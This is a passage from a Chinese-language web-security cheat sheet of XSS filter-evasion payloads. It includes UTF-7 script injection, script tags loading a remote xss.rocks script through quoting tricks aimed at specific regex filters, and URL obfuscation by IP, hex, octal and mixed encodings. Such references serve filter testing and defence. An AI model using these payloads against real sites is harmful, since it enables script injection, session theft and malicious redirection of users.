font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果存在XSS的页面没有提供页面编码头部,或者使用了任何设置为使用UTF-7编码的浏览器,就可以使用下列方式进行攻击(感谢Roman Ivanov提供)。这在任何不改变编码类型的现代浏览器上是无效的,这也是为什么标记为完全不支持的原因。Watchfire在Google的自定义404脚本中发现这个问题:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.83.    利用HTML引号包含的XSS</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这在IE中测试通过,但还得视情况而定。它是为了绕过那些允许"<SCRIPT>"但是不允许"<SCRIPT SRC..."形式的正则过滤即"/<script[^>]+src/i":</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这是为了绕过那些允许"<SCRIPT>"但是不允许"<SCRIPTSRC..."形式的正则过滤即" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"(这很重要,因为在实际环境中出现过这种正则过滤):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT =">" SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 另一个绕过此正则过滤" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT a=">" '' SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 又一个绕过正则过滤" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS。尽管不想提及防御方法,但如果你想允许<SCRIPT>标签但不加载远程脚本,针对这种XSS只能使用状态机去防御(当然如果允许<SCRIPT>标签的话,还有其他方法绕过):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT "a='>'" SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 最后一个绕过此正则过滤" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS,使用了重音符(在FireFox下无效):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT a=`>` SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这是一个XSS样例,用来绕过那些不会检查引号配对,而是发现任何引号就立即结束参数字符串的正则表达式:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这个XSS很让人担心,因为如果不过滤所有活动内容几乎不可能防止此攻击:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.84.    URL字符绕过</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 假定"http://www.google.com/"是不被允许的:</p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.1. IP代替域名</span></h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://66.102.7.147/">XSS</A></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.2. URL编码</span></h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.3. 双字节编码</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> (注意:还有另一种双字节编码):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://1113982867/">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.4. 十六进制编码</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 每个数字的允许的范围大概是240位字符,就如你在第二位上看到的,并且由于十六进制是在0到F之间,所以开头的0可以省略:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.5. 八进制编码</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 又一次允许填充,尽管你必须保证每类在4位字符以上-例如A类,B类等等:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://0102.0146.0007.00000223/">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.6. 混合编码</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 让我们混合基本编码并在其中插入一些TAB和换行,虽然不知道浏览器为什么允许这样做。TAB和换行只有被引号包含时才有效:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <A HREF="h</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> tt p://6 6.000146.0x7.147/">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.7. 协议解析绕过</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> (// 替代http://可以节约很多字节).当输入空间有限时很有用(少两个字符可能解决大问题) 而且可以轻松绕过类似"(ht|f)tp(s)?://"的正则过滤(感谢Ozh提供这部分).你也可以将"//"换成"\\"。你需要保证斜杠在正确的位置,否则可能被当成相对路径URL:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="//www.google.com/">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.8. Google的"feeling lucky"功能1</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> Firefox使用Google的"feeling lucky"功能根据用户输入的任何关键词来将用户重定向。如果你存在漏洞的页面在某些随机关键词上搜索引擎排名是第一的,你就可以利用这一特性来攻击FireFox用户。这使用了Firefox的"keyword:"协议。你可以像下面一样使用多个关键词"keyword:XSS+RSnake"。这在Firefox2.0后不再有效.</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="//google">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.9. Google的"feeling lucky"功能2</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这使用了一个仅在FireFox上有效的小技巧,因为它实现了"feelinglucky"功能。不像下面一个例子,这个在Opera上无效因为Opera会认为只是一个老式的HTTP基础认证钓鱼攻击,但它并不是。它只是一个畸形的URL。如果你点击了对话框的确定,它就可以生效。但是在Opera上会是一个错误对话框,所以认为其不被Opera所支持,同样在Firefox2.0后不再有效。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://ha.ckers.org@google">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.10.      Google的"feeling lucky"功能3</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这是一个畸形的URL只在FireFox和Opera下有效,因为它们实现了"feeling lucky"功能。像上面的例子一样,它要求你的攻击页面在Google上特定关键词排名第一(在这个示例里关键词是"google")</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://google:ha.ckers.org">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.11.      移除别名</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 当结合上面的URL,移除"www."会节约4个字节,总共为正确设置的服务器节省9字节:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://google.com/">XSS</A></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.12.      绝对DNS名称后额外的点</span></h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://www.google.com./">XSS</A></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.13.      JavaScriptlink location</span></h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; 